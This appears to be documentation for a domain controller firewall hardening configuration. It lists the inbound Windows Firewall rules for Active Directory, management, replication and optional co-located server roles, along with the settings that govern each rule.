Active Directory Domain Controller - W32Time (NTP-UDP-In)

As the NTP service might be used by non-Windows clients, we do not limit the remote addresses.

Active Directory Domain Controller (RPC-EPMAP)

Kerberos Key Distribution Center - PCR (UDP-In)

Kerberos Key Distribution Center - PCR (TCP-In)

Active Directory Domain Controller (RPC)

This rule enables multiple crucial RPC-based protocols, including:

• Directory Replication Service
• Netlogon Service
• Key Distribution Service

Two dynamic RPC ports are used by default, but the services can be reconfigured to use static ones.

Active Directory Domain Controller - LDAP (UDP-In)

Active Directory Domain Controller - LDAP (TCP-In)

Active Directory Domain Controller - Secure LDAP (TCP-In)

Active Directory Domain Controller - LDAP for Global Catalog (TCP-In)

Active Directory Domain Controller - Secure LDAP for Global Catalog (TCP-In)

DNS (UDP, Incoming)

As the DNS service might be used by non-Windows clients, we do not limit the remote addresses.

DNS (TCP, Incoming)

As the DNS service might be used by non-Windows clients, we do not limit the remote addresses.

Kerberos Key Distribution Center (TCP-In)

Kerberos Key Distribution Center (UDP-In)

Active Directory Domain Controller - SAM/LSA (NP-UDP-In)

We are not sure if this rule is actually needed, as we have never seen UDP traffic on port 445. However, it is part of the predefined firewall rules on Windows Server and is mentioned in several official documents.

Active Directory Domain Controller - SAM/LSA (NP-TCP-In)

Active Directory Domain Controller - Echo Request (ICMPv4-In)

Active Directory Domain Controller - Echo Request (ICMPv6-In)

Active Directory Domain Controller - NetBIOS name resolution (UDP-In)

This rule is governed by the EnableNetbiosDatagramService setting.

Core Networking - Destination Unreachable (ICMPv6-In)

Core Networking - Destination Unreachable Fragmentation Needed (ICMPv4-In)

Core Networking - Neighbor Discovery Advertisement (ICMPv6-In)

Core Networking - Neighbor Discovery Solicitation (ICMPv6-In)

Core Networking - Packet Too Big (ICMPv6-In)

Core Networking - Parameter Problem (ICMPv6-In)

Core Networking - Time Exceeded (ICMPv6-In)

File and Printer Sharing (NB-Name-In)

This rule is governed by the EnableNetbiosNameService setting.

File and Printer Sharing (NB-Session-In)

This rule is governed by the EnableNetbiosSessionService setting.

Management Traffic

Active Directory Web Services (TCP-In)

The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Windows Remote Management (HTTP-In)

This rule is governed by the EnableWindowsRemoteManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Windows Remote Management (HTTPS-In)

This custom rule is governed by the EnableWindowsRemoteManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Windows Management Instrumentation (WMI-In)

This protocol uses a dynamic RPC port by default, but it can be reconfigured to use a static one. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote Desktop - User Mode (UDP-In)

This rule is governed by the EnableRemoteDesktop setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote Desktop - User Mode (TCP-In)

This rule is governed by the EnableRemoteDesktop setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote Desktop (TCP-In)

This rule is governed by the EnableRemoteDesktop setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

DFS Management (TCP-In)

The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

RPC (TCP, Incoming)

The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Windows Backup (RPC)

This rule is governed by the EnableBackuManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Performance Logs and Alerts (TCP-In)

This rule is governed by the EnablePerformanceLogAccess setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

COM+ Remote Administration (DCOM-In)

This rule is governed by the EnableComPlusManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote Event Log Management (RPC)

This rule is governed by the EnableEventLogManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote Scheduled Tasks Management (RPC)

This rule is governed by the EnableScheduledTaskManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote Service Management (RPC)

This rule is governed by the EnableServiceManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote Volume Management - Virtual Disk Service (RPC)

This rule is governed by the EnableDiskManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote Volume Management - Virtual Disk Service Loader (RPC)

This rule is governed by the EnableDiskManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Windows Defender Firewall Remote Management (RPC)

This rule is governed by the EnableFirewallManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Replication Traffic

DFS Replication (RPC-In)

This protocol uses a dynamic RPC port by default, but it can be reconfigured to use a static one.

File Replication (RPC)

This protocol uses a dynamic RPC port by default, but it can be reconfigured to use a static one.

Additional Server Roles and Features

Server Role Co-Location

As a security best-practice, it is recommended not to deploy additional server roles on domain controller servers. Unfortunately, real-world environments do not always follow this recommendation and domain controllers often serve as branch office DHCP and RADIUS servers as well. This chapter therefore contains a list of optional firewall rules that can be enabled to support such scenarios.

For now, the following Windows Server roles and features are covered:

• Windows Internet Naming Service (WINS)
• Dynamic Host Configuration Protocol (DHCP) Server
• Network Policy Server (NPS)
• Web Server (IIS)
• Windows Deployment Services (WDS)
• Key Management Service (KMS)
• File Server Resource Manager (FSRM)
• Print Spooler (highly discouraged)
• Windows Server Update Services (WSUS)
• OpenSSH SSH Server

Windows Internet Naming Service (WINS) (TCP-In)

This rule is governed by the EnableWINS setting.

Windows Internet Naming Service (WINS) (UDP-In)

This rule is governed by the EnableWINS setting.

Windows Internet Naming Service (WINS) - Remote Management (RPC)

This rule is governed by the EnableWINS setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

DHCP Server v4 (UDP-In)

This rule is governed by the EnableDhcpServer setting.

DHCP Server v4 (UDP-In)

This rule is governed by the EnableDhcpServer setting.

DHCP Server v6 (UDP-In)

This rule is governed by the EnableDhcpServer setting.

DHCP Server v6 (UDP-In)

This rule is governed by the EnableDhcpServer setting.

DHCP Server Failover (TCP-In)

This rule is governed by the EnableDhcpServer setting.

If the DHCP server role is co-located with the domain controller role, it is highly probable that other DCs are configured in the same way. It would therefore make sense to allow DHCP failover betweeen DCs.

DHCP Server (RPC-In)

This rule is governed by the EnableDhcpServer setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Network Policy Server (Legacy RADIUS Authentication - UDP-In)

This rule is governed by the EnableNPS setting.

Network Policy Server (Legacy RADIUS Accounting - UDP-In)

This rule is governed by the EnableNPS setting.

Network Policy Server (RADIUS Authentication - UDP-In)

This rule is governed by the EnableNPS setting.

Network Policy Server (RADIUS Accounting - UDP-In)

This rule is governed by the EnableNPS setting.

Network Policy Server (RPC)

This rule is governed by the EnableNPS setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

World Wide Web Services (HTTP Traffic-In)

This rule is governed by the EnableWebServer setting.

World Wide Web Services (HTTPS Traffic-In)

This rule is governed by the EnableWebServer setting.

Windows Deployment Services (UDP-In)

This rule is governed by the EnableWDS setting.

Windows Deployment Services (RPC-In)

This rule is governed by the EnableWDS setting.

Key Management Service (TCP-In)

This rule is governed by the EnableKMS setting.

Remote File Server Resource Manager Management - FSRM Service (RPC-In)

This rule is governed by the EnableFSRMManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

Remote File Server Resource Manager Management - FSRM Reports Service (RPC-In)

This rule is governed by the EnableFSRMManagement setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.

File and Printer Sharing (Spooler Service - RPC)

This rule is governed by the EnablePrintSpooler setting.

Windows Server Update Services (HTTP-In)

This rule is governed by the EnableWSUS setting.

Windows Server Update Services (HTTPS-In)

This rule is governed by the EnableWSUS setting.

OpenSSH SSH Server (sshd)

This rule is governed by the EnableOpenSSHServer setting. The scope of this rule can further be limited by enabling the BlockManagementFromDomainControllers setting.